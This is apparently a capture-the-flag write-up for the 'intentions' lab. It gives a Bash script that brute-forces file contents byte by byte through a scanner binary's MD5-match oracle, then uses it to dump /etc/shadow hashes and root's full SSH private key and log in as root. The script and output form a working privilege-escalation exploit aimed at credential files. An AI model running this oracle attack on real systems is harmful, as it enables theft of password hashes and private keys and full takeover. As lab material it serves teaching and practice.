brute.sh


#!/bin/bash
 
# Candidate characters the recovery loop tries, in try order: space,
# digits, two alphabet runs, the 32 ASCII punctuation marks, then newline.
# NOTE(review): the second alphabet run repeats the lower-case letters, so
# only lower-case letters are ever tried by this listing; left unchanged.
charset_ascii=' 0123456789'
charset_ascii+='abcdefghijklmnopqrstuvwxyz'
charset_ascii+='abcdefghijklmnopqrstuvwxyz'
charset_ascii+='!"#$%&'\''()*+,-./:;<=>?@[\]^_`{|}~'
charset_ascii+=$'\n'
 
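#######################################
# Recover the contents of a file one character at a time, using the
# scanner's "matches" answer as a yes/no oracle.
#
# For each candidate character c the function hashes known+c with MD5 and
# invokes /opt/scanner/scanner with -c FILE -s HASH -l LENGTH; when the
# scanner's output contains "matches" the character is confirmed, appended
# to the known prefix and printed. A full pass over the charset with no
# match ends the loop. (The scanner's exact semantics are inferred from
# this invocation; the binary itself is not part of this listing.)
#
# Defender's note: the primitive is a binary that answers hash-equality
# questions about files its caller cannot read directly. Checking the
# caller's access to the -c path before opening it (or not running with
# elevated access) removes the per-byte read oracle.
#
# Globals:   charset_ascii (read) - candidate characters, in try order
# Arguments: $1 - already-recovered prefix (normally '')
#            $2 - path handed to the scanner
# Outputs:   each recovered character to stdout as it is found, then a
#            trailing newline; scanner diagnostics pass through on stderr
# Returns:   0
#######################################
bruteforce() {
  local known="$1"
  local file="$2"
  local found_match=1
  local -r charset_len=${#charset_ascii}   # loop-invariant, hoisted
  local i char val h out

  # Each outer pass extends the prefix by exactly one character.
  while (( found_match == 1 )); do
    found_match=0

    for ((i = 0; i < charset_len; i++)); do
      char="${charset_ascii:i:1}"
      val="$known$char"

      # MD5 of the candidate prefix; `read` takes the first field of
      # md5sum's "<hash>  -" line. Kept separate from `local` so the
      # pipeline's status is not masked by the declaration.
      read -r h _ < <(printf '%s' "$val" | md5sum)

      # Invoke the scanner directly. The previous version built the
      # command line with printf and ran it through `xargs | bash -c`,
      # which re-parses $file and $h as shell code: a path containing
      # quotes, `$(...)` or `;` would break the call or run as the
      # invoking user.
      out=$(/opt/scanner/scanner -c "$file" -s "$h" -l "${#val}")

      if [[ $out == *"matches"* ]]; then
        printf '%s' "$char"
        found_match=1
        known="$val"
        break
      fi
    done
  done

  printf '\n'
}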
 
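#######################################
# Entry point: require exactly one argument and run the recovery loop.
# Arguments: $1 - path handed to the scanner
# Outputs:   usage line on stderr when misused
# Returns:   exits 1 on a usage error; otherwise bruteforce's status
#######################################
main() {
  # Exactly one positional argument (the file path) is required.
  if [[ $# -ne 1 ]]; then
    printf '[+] usage: %s filename\n' "$0" >&2
    exit 1
  fi

  local file="$1"
  bruteforce '' "$file"
}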
 
# Dispatch to main with the script's own arguments.
main "$@"

It took me some time to write this Bash script that exploits the scanner, /opt/scanner/scanner. I struggled quite a lot with processing special characters, especially the whitespace (' ') and newline (\n). echo -n is a bad choice for such an operation, as the -n flag discards the newline character, so I opted to use printf instead.

greg@intentions:~$ ./brute.sh /etc/shadow
root:$y$j9T$JjiD.nZgfr5ZSBdO4E9rY0$ZOElIJaX9F5qdpt54qFqtklDntYf/yo4kEUqqD/KFyA:19519:0:99999:7:::
daemon:*:19213:0:99999:7:::
bin:*:19213:0:99999:7:::
sys:*:19213:0:99999:7:::
sync:*:19213:0:99999:7:::
games:*:19213:0:99999:7:::
man:*:19213:0:99999:7:::
lp:*:19213:0:99999:7:::
mail:*:19213:0:99999:7:::
news:*:19213:0:99999:7:::
uucp:*:19213:0:99999:7:::
proxy:*:19213:0:99999:7:::
www-data:*:19213:0:99999:7:::
backup:*:19213:0:99999:7:::
list:*:19213:0:99999:7:::
irc:*:19213:0:99999:7:::
gnats:*:19213:0:99999:7:::
nobody:*:19213:0:99999:7:::
_apt:*:19213:0:99999:7:::
systemd-network:*:19213:0:99999:7:::
systemd-resolve:*:19213:0:99999:7:::
messagebus:*:19213:0:99999:7:::
systemd-timesync:*:19213:0:99999:7:::
pollinate:*:19213:0:99999:7:::
sshd:*:19213:0:99999:7:::
syslog:*:19213:0:99999:7:::
uuidd:*:19213:0:99999:7:::
tcpdump:*:19213:0:99999:7:::
tss:*:19213:0:99999:7:::
landscape:*:19213:0:99999:7:::
usbmux:*:19389:0:99999:7:::
steven:$y$j9T$TM/hbL/SRCyk67reQMC9C/$QHTiY3rtnGuQS1teQB7jrMys0eMkm7.tlnKFGrsoIa9:19391:0:99999:7:::
lxd:!:19389::::::
fwupd-refresh:*:19389:0:99999:7:::
mysql:!:19389:0:99999:7:::
ftp:*:19389:0:99999:7:::
greg:$y$j9T$/LxemPBd1ROuQOmQY7OJ0/$T7eTn0juiHsctWeX3GIOynHPuGKRiFMO1F.1zzPG696:19390:0:99999:7:::
legal:$y$j9T$Sl/k/bJVnQR85nLW6kAwj1$lmrMHlaVA9/xFczVtj92LsiLw7xpd4YYrmfJ7Yv37aD:19518:0:99999:7:::
_laurel:!:19527::::::

It works well. Unfortunately, those system credential hashes are not crackable

greg@intentions:~$ ./brute.sh /home/steven/.ssh/id_rsa
panic: open /home/steven/.ssh/id_rsa: no such file or directory
 
[...REDACTED...]
 
greg@intentions:~$ ./brute.sh /home/steven/.ssh/authorized_keys
 
greg@intentions:~$ ./brute.sh /home/legal/.ssh/authorized_keys
panic: open /home/legal/.ssh/authorized_keys: no such file or directory
 
[...REDACTED...]
 
greg@intentions:~$ ./brute.sh /home/legal/.ssh/id_rsa
panic: open /home/legal/.ssh/id_rsa: no such file or directory
 
[...REDACTED...]

I checked the SSH directories of both the steven and legal users and was unable to find anything useful.

greg@intentions:~$ ./brute.sh /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
 
┌──(kali㉿kali)-[~/…/htb/labs/intentions/scanner]
└─$ nano id_rsa.root
┌──(kali㉿kali)-[~/…/htb/labs/intentions/scanner]
└─$ chmod 600 id_rsa.root 

However, the private SSH key for the root user is present, and I was able to extract it using the exploit script above.

┌──(kali㉿kali)-[~/archive/htb/labs/intentions]
└─$ ssh root@$IP -i scanner/id_rsa.root
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-76-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of thu jul  6 10:18:52 PM UTC 2023
 
  system load:           0.11376953125
  usage of /:            63.6% of 6.30GB
  memory usage:          16%
  swap usage:            0%
  processes:             229
  users logged in:       1
  ipv4 address for eth0: 10.10.11.220
  ipv6 address for eth0: dead:beef::250:56ff:feb9:5f29
 
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
12 additional security updates can be applied with ESM Apps.
learn more about enabling esm apps service at https://ubuntu.com/esm
 
 
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
root@intentions:~# whoami
root
root@intentions:~# hostname
intentions
root@intentions:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.220  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:5f29  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:5f29  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:5f:29  txqueuelen 1000  (Ethernet)
        RX packets 936995  bytes 127783186 (127.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1127111  bytes 758239425 (758.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 13138  bytes 934710 (934.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13138  bytes 934710 (934.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise